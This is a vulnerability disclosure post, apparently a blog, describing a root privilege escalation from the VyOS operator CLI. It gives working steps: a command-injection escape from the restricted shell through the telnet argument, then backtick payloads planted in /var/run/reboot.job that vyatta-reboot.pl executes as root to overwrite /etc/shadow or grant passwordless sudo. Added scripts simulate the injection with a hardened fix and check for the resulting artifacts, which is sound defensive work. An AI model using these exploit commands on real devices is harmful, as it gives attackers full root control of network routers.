VyOS root privilege escalation from operator CLI

VyOS is an open source network operating system that has had root privilege escalation vulnerabilities disclosed before. This post discloses a new attack path from the low-privilege operator shell to root. Because the op-mode wrappers and the sudo-users scripts come from the Vyatta code base, the same path is likely to apply to other Vyatta derivatives such as Brocade vRouter and Ubiquiti EdgeOS, but it has only been tested on VyOS 1.1.8.

Here is an example of how an operator account is created in VyOS.

configure
set system login user operator level operator
set system login user operator authentication plaintext-password Operator123
commit
save

Once logged in as operator (password Operator123 in the example above) you are dropped into the restricted shell /opt/vyatta/bin/restricted-shell. An operator-level account is meant to be read-only: it cannot enter configure mode to change the configuration, and it has no access to bash or to arbitrary system commands, only to the op-mode commands exposed by the CLI.

The op-mode telnet command hands its host argument to a shell command line without quoting it, so a semicolon ends the telnet invocation and whatever follows runs as a second command. Execute the following to escape the restricted shell and land in a normal bash shell running as the operator user:
telnet "127.0.0.1;bash"
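To make the escape mechanism concrete, here is an added example (not code from VyOS or from the original post) that simulates the op-mode telnet wrapper. It assumes the vulnerable wrapper pastes the user's argument into a string that is then evaluated by the shell, which is the behaviour the escape above relies on; telnet_stub stands in for /usr/bin/telnet so the script runs offline. The hardened variant and the valid_target check are my own suggestions for how such a wrapper should be written.

```shell
#!/bin/sh
# Added example, not VyOS code: a simulated op-mode wrapper showing why
# telnet "127.0.0.1;bash" breaks out of the restricted shell.

# Stand-in for /usr/bin/telnet so the example runs offline. It only reports
# how many arguments it received and what they were.
telnet_stub() {
    printf 'telnet_stub argc=%d argv=[%s]\n' "$#" "$*"
}

# Vulnerable wrapper (assumed shape of the real one): the argument is pasted
# into a command string that is re-parsed by the shell, so ';' terminates the
# telnet command and the rest runs as a second command with the wrapper's
# privileges. This is exactly what '127.0.0.1;bash' exploits.
op_telnet_vulnerable() {
    eval "telnet_stub $1"
}

# Hardened wrapper: the argument is passed as a single word and never
# re-parsed, so shell metacharacters reach telnet as part of the hostname.
op_telnet_hardened() {
    telnet_stub "$1"
}

# Belt and braces: reject anything that is not a plausible hostname or IP
# before it reaches any command line. Returns 0 if acceptable, 1 otherwise.
valid_target() {
    case "$1" in
        ''|*[!A-Za-z0-9.:_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Demonstration when run directly. Constructed payload, mirroring the post.
payload='127.0.0.1;echo INJECTED'
echo "vulnerable wrapper:"; op_telnet_vulnerable "$payload"
echo "hardened wrapper:";   op_telnet_hardened  "$payload"
if valid_target "$payload"; then echo "validator: accepted"; else echo "validator: rejected"; fi
```

Run it as-is: the vulnerable wrapper prints the telnet stub's line and then INJECTED on its own, the hardened wrapper passes the whole string as one argument, and the validator rejects it outright.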

Verify that you now have a real shell, and list what the operator account is allowed to run through sudo:
id
sudo -l

As operator you still cannot run arbitrary commands as root: sudo -l shows that the account may only run the scripts under /opt/vyatta/bin/sudo-users/. The escalation therefore has to go through one of those scripts.

The vyatta-reboot.pl script can be abused because its show_reboot action reads /var/run/reboot.job and interpolates the file's contents into a command it executes as root. Writing a backtick-wrapped command into that file therefore gets the command substituted and run with root privileges. The following payload sets root's password to pwn3d by rebuilding /etc/shadow with a new root entry (the third field, 17481, is the last-change day count and any value works; root's old entry is dropped with grep rather than by assuming it is the first line):
echo '`ROOTPW=$(openssl passwd -1 pwn3d); echo "root:$ROOTPW:17481:0:99999:7:::" > /tmp/shadow; grep -v "^root:" /etc/shadow >> /tmp/shadow; mv /tmp/shadow /etc/shadow; chmod 640 /etc/shadow; chown root:shadow /etc/shadow`' > /var/run/reboot.job

sudo /opt/vyatta/bin/sudo-users/vyatta-reboot.pl --action show_reboot

rm /var/run/reboot.job

Now exit the CLI as the operator account and log in as root with the password pwn3d.

As an alternative to setting root's password, the same primitive can grant the operator group unrestricted, passwordless sudo by appending a line to /etc/sudoers. Keep the appended line exactly as shown: sudo refuses to run at all if /etc/sudoers contains a syntax error, which would lock the attacker out as well.
echo '`cp /etc/sudoers /tmp/; echo "%operator ALL=NOPASSWD: ALL" >> /tmp/sudoers; mv /tmp/sudoers /etc/; chmod 440 /etc/sudoers; chown root:root /etc/sudoers`' > /var/run/reboot.job

sudo /opt/vyatta/bin/sudo-users/vyatta-reboot.pl --action show_reboot

rm /var/run/reboot.job

Now exit the CLI as the operator account and log back in as operator. Break out of the restricted shell again, escalate to a root shell and verify that you are uid 0:
telnet "127.0.0.1;bash"
sudo su -
id
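For defenders, here is an added example (mine, not part of the original post or of VyOS) of quick checks for the artifacts both variants leave behind: a usable root password hash in /etc/shadow, an unrestricted sudoers entry for the operator group, and a planted /var/run/reboot.job. File paths are parameters so the checks can be exercised against constructed copies below; on a real box pass /etc/shadow, /etc/sudoers and /var/run/reboot.job. The assumption that a legitimate reboot.job holds only a bare at job number is mine.

```shell
#!/bin/sh
# Added example, not VyOS code: post-exploitation checks for the two
# persistence methods described in the post.

# Print sudoers lines that give the operator user or group an unrestricted
# command spec (ending in ALL). The stock VyOS entry that allows only the
# sudo-users scripts is not flagged. Returns 0 if clean, 1 if any hit.
check_sudoers() {
    hits=$(grep -E '^[[:space:]]*%?operator[[:space:]].*[:=)][[:space:]]*ALL[[:space:]]*$' "$1" 2>/dev/null || true)
    if [ -n "$hits" ]; then
        printf 'SUSPICIOUS sudoers entries in %s:\n%s\n' "$1" "$hits"
        return 1
    fi
    return 0
}

# Does root have a usable password hash? Returns 0 if yes, 1 if the entry is
# missing or locked ('*' or anything starting with '!').
root_password_usable() {
    hash=$(awk -F: '$1 == "root" { print $2; exit }' "$1")
    case "$hash" in
        ''|'*'|'!'*) return 1 ;;
        *) return 0 ;;
    esac
}

# Assumption: a legitimate reboot.job contains only an at job number. Anything
# else (empty, or non-digits such as a backtick payload) means the file was
# planted. Returns 0 if tampered, 1 if clean or absent.
reboot_job_tampered() {
    [ -f "$1" ] || return 1
    content=$(cat "$1")
    case "$content" in
        ''|*[!0-9]*) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample files standing in for the real ones (fake hashes).
WORK=$(mktemp -d)
printf '%s\n' 'root:$1$saltsalt$abcdefghijklmnopqrstu:17481:0:99999:7:::' \
    'daemon:*:17000:0:99999:7:::' \
    'operator:$6$salt$hash:17000:0:99999:7:::' > "$WORK/shadow.pwned"
printf '%s\n' 'root:!:17000:0:99999:7:::' \
    'operator:$6$salt$hash:17000:0:99999:7:::' > "$WORK/shadow.clean"
printf '%s\n' 'root ALL=(ALL) ALL' \
    '%operator ALL=NOPASSWD: /opt/vyatta/bin/sudo-users/vyatta-reboot.pl' \
    '%operator ALL=NOPASSWD: ALL' > "$WORK/sudoers.pwned"
printf '%s\n' 'root ALL=(ALL) ALL' \
    '%operator ALL=NOPASSWD: /opt/vyatta/bin/sudo-users/vyatta-reboot.pl' > "$WORK/sudoers.clean"
printf '%s\n' '`cp /etc/sudoers /tmp/`' > "$WORK/reboot.job.pwned"
printf '%s\n' '17' > "$WORK/reboot.job.clean"

# Demonstration: each check against its tampered and clean sample.
for state in pwned clean; do
    echo "== $state =="
    check_sudoers "$WORK/sudoers.$state" && echo "sudoers: ok"
    if root_password_usable "$WORK/shadow.$state"; then echo "shadow: root has a usable password"; else echo "shadow: root locked"; fi
    if reboot_job_tampered "$WORK/reboot.job.$state"; then echo "reboot.job: PLANTED"; else echo "reboot.job: ok"; fi
done
```

On a live system, run the three checks against the real paths from a root or audit session; a usable root hash with a recent last-change day, an operator line ending in ALL, or a reboot.job that is not a plain number are each worth an incident ticket on their own.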


Author: Chupacabra
